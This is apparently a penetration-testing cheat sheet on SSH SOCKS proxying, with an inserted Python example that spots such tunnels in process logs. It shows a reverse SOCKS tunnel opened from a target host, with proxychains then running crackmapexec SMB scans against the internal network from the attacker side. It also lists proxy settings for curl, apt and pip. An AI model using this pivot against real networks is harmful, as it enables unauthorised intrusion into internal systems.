SSH Socks Proxy

SSH comes with a built-in SOCKS5 proxy feature (dynamic port forwarding).

Local Port -> Distant -> Net

ssh -D 127.0.0.1:LOCALPORT usr@DISTANT

Distant Port -> Local -> Net

Use case: run the ssh command on the target side; the SOCKS port then shows up on the attacker side, and proxychains forwards requests through it.

# Target side
ssh -R 127.0.0.1:DISTANTPORT usr@DISTANT

# Attacker side (8888 is the DISTANTPORT chosen on the target side)
echo -e '[ProxyList]\nsocks5 127.0.0.1 8888' > /tmp/TARGET
proxychains -q -f /tmp/TARGET crackmapexec smb TARGET_NETWORK
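Added example (not part of the original page): one way to spot the two tunnel forms above in process-creation logs, by parsing an ssh command line and telling a SOCKS listener (`-D`, or `-R` with only `[bind_address:]port`) apart from an ordinary fixed `-R port:host:hostport` forward. The function names, the `usr@gw` host and the sample command lines are constructed, and the list of argument-taking options is assumed from the ssh(1) synopsis of current OpenSSH.

```python
import os
import re
import shlex

# Option letters that take an argument, per the ssh(1) synopsis (assumed current OpenSSH).
TAKES_ARG = set("BbcDEeFIiJLlmOoPpQRSWw")
# [bind_address:]port with nothing after it: the -R form that opens a SOCKS listener.
SOCKS_SPEC = re.compile(r"(?:(?:\[[^\]]*\]|[^:\s]*):)?\d+")

def classify(flag, arg):
    """Return ("local"|"remote", spec) if this option opens a SOCKS listener."""
    if flag == "o":  # only the -o Key=value form is handled here
        key, _, arg = arg.partition("=")
        flag = {"dynamicforward": "D", "remoteforward": "R"}.get(key.strip().lower())
    if flag == "D":
        return ("local", arg)
    if flag == "R" and SOCKS_SPEC.fullmatch(arg):
        return ("remote", arg)

def find_socks_forwards(cmdline):
    """List the SOCKS forwards requested by one ssh command line."""
    argv = shlex.split(cmdline)
    if not argv or os.path.basename(argv[0]) != "ssh":
        return []
    found, seen_dest, i = [], False, 1
    while i < len(argv):
        tok = argv[i]
        i += 1
        if not tok.startswith("-") or tok == "-":
            if seen_dest:
                break  # second bare word starts the remote command
            seen_dest = True  # ssh still parses options after the destination
            continue
        for j, flag in enumerate(tok[1:], start=2):  # clustered flags, e.g. -fNR
            if flag in TAKES_ARG:
                attached = tok[j:]  # "-D1080" style, else the next token
                arg = attached or (argv[i] if i < len(argv) else "")
                if not attached:
                    i += 1
                hit = classify(flag, arg)
                if hit:
                    found.append(hit)
                break
    return found

if __name__ == "__main__":
    # Constructed command lines, as they might appear in process-creation logs.
    for line in ("ssh -fNR 127.0.0.1:8888 usr@gw", "ssh -R 8080:localhost:80 usr@gw"):
        print(line, "->", find_socks_forwards(line))
```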

Proxy Usage

# CURL
#   --socks5 resolves the hostname locally; --socks5-hostname resolves it through the proxy
curl --socks5 HOST:PORT https://ip.offensive.run

# APT
#   -o takes the value as Option=value
apt-get -o Acquire::socks::proxy="socks5://HOST:PORT" update


# PROXYCHAINS4
#   Install :
#   $ apt-get install proxychains4
#   Then replace the default "socks4 127.0.0.1 9050" with "socks5 HOST PORT" in /etc/proxychains4.conf
proxychains4 curl https://ip.offensive.run


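# PIP
#   The proxy is given as a URL (scheme://host:port); SOCKS support in pip needs the PySocks package
python3 -m pip --proxy socks5://HOST:PORT install --upgrade aiohttp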